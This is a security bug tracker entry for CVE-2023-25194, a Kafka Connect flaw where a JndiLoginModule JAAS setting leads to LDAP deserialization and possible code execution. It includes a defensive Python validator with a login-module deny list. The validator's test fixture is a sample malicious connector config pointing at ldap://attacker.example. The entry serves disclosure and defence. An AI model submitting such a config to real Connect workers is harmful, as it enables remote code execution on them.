Bug 2216516 (CVE-2023-25194) - CVE-2023-25194 kafka: RCE/DoS via SASL JAAS JndiLoginModule configuration in Kafka Connect
Summary: CVE-2023-25194 kafka: RCE/DoS via SASL JAAS JndiLoginModule configuration in ...
Keywords:
Status: NEW
Alias: CVE-2023-25194
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Nobody
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks: 2167967
Reported: 2023-06-21 16:08 UTC by Chess Hazlett
Modified: 2023-07-21 22:26 UTC (History)

Fixed In Version: apache kafka 3.4.0
Doc Type: ---
Doc Text:
A flaw was found in the Apache Kafka Connect REST API: an authenticated operator can set the `sasl.jaas.config` property of a connector's Kafka clients (directly, or through the `producer.override.`, `consumer.override.` and `admin.override.` prefixes) to `com.sun.security.auth.module.JndiLoginModule`. The Connect worker then connects to an attacker-controlled LDAP server and deserializes its response. This lets an authenticated attacker cause a denial of service or execute arbitrary code on the worker, provided that suitable gadget classes are present on the server's classpath. Apache Kafka 3.4.0 blocks `JndiLoginModule` in `sasl.jaas.config` by default through the `org.apache.kafka.disallowed.login.modules` system property.
Clone Of:
Environment:
Last Closed:
Embargoed:



Description Chess Hazlett 2023-06-21 16:08:21 UTC
When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties.

This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. An attacker can cause unrestricted deserialization of untrusted data or an RCE vulnerability when there are gadgets on the classpath.


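The following is an added example, not code from the bug report or from the Kafka project, showing the check a Connect operator can put in front of the REST API (or run over captured request bodies) to catch the configuration the report describes: it parses the JAAS string carried by `sasl.jaas.config` and the three `*.override.sasl.jaas.config` keys and rejects any login module on a deny list. The deny list, the sample request bodies and the hostname `attacker.example` are constructed for the example; the JAAS syntax (`<module class> <flag> [key=value ...];`) and the `user.provider.url` / `group.provider.url` option names are those of the JDK's `JndiLoginModule`.

```python
from __future__ import annotations

import json

# Login modules a connector config must never name. Kafka 3.4.0 blocks
# JndiLoginModule by default via the org.apache.kafka.disallowed.login.modules
# system property; this set is the example's own deny list, not Kafka's.
DISALLOWED_LOGIN_MODULES = {
    "com.sun.security.auth.module.JndiLoginModule",
}

# Keys through which a connector config reaches the JAAS setting of the
# producer, consumer or admin client the worker creates for the connector.
JAAS_KEYS = (
    "sasl.jaas.config",
    "producer.override.sasl.jaas.config",
    "consumer.override.sasl.jaas.config",
    "admin.override.sasl.jaas.config",
)


def login_modules(jaas_config: str) -> list[str]:
    """Return the login-module class names in a JAAS config string.

    Each ';'-terminated entry is '<module> <flag> [key=value ...]', so the
    module is the first whitespace-separated token of the entry.
    """
    modules = []
    for entry in jaas_config.split(";"):
        entry = entry.strip()
        if entry:
            modules.append(entry.split(None, 1)[0])
    return modules


def find_disallowed_modules(connector_config: dict) -> dict[str, list[str]]:
    """Map each offending config key to the disallowed modules it names."""
    findings: dict[str, list[str]] = {}
    for key in JAAS_KEYS:
        value = connector_config.get(key)
        if not isinstance(value, str):
            continue
        bad = [m for m in login_modules(value) if m in DISALLOWED_LOGIN_MODULES]
        if bad:
            findings[key] = bad
    return findings


def validate_connector_request(body: str) -> tuple[bool, dict[str, list[str]]]:
    """Validate the JSON body of POST /connectors or PUT /connectors/{name}/config.

    Accepts both shapes: {"name": ..., "config": {...}} and a bare config map.
    Returns (accepted, findings); findings is empty when the request is clean.
    """
    doc = json.loads(body)
    if not isinstance(doc, dict):
        return False, {}
    config = doc.get("config", doc)
    if not isinstance(config, dict):
        return False, {}
    findings = find_disallowed_modules(config)
    return (not findings), findings


# Constructed sample request: a connector whose producer override points the
# worker at an attacker-controlled LDAP server through JndiLoginModule.
MALICIOUS_REQUEST = json.dumps({
    "name": "sink-1",
    "config": {
        "connector.class": "FileStreamSink",
        "topics": "t",
        "producer.override.sasl.jaas.config": (
            "com.sun.security.auth.module.JndiLoginModule required "
            'user.provider.url="ldap://attacker.example/o=x" '
            'group.provider.url="ldap://attacker.example/o=x";'
        ),
    },
})

# Constructed benign request using Kafka's own PlainLoginModule.
BENIGN_REQUEST = json.dumps({
    "name": "sink-2",
    "config": {
        "connector.class": "FileStreamSink",
        "topics": "t",
        "producer.override.sasl.jaas.config": (
            "org.apache.kafka.common.security.plain.PlainLoginModule required "
            'username="connect" password="secret";'
        ),
    },
})

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        accepted, findings = validate_connector_request(body)
        print(label, "accepted" if accepted else "rejected", findings)
```

This check is a stopgap for workers that cannot be upgraded to 3.4.0 yet; it does nothing about a `JndiLoginModule` entry placed in the worker's own JAAS configuration by someone with host access, and it should be paired with a review of which principals may call the Connect REST API at all.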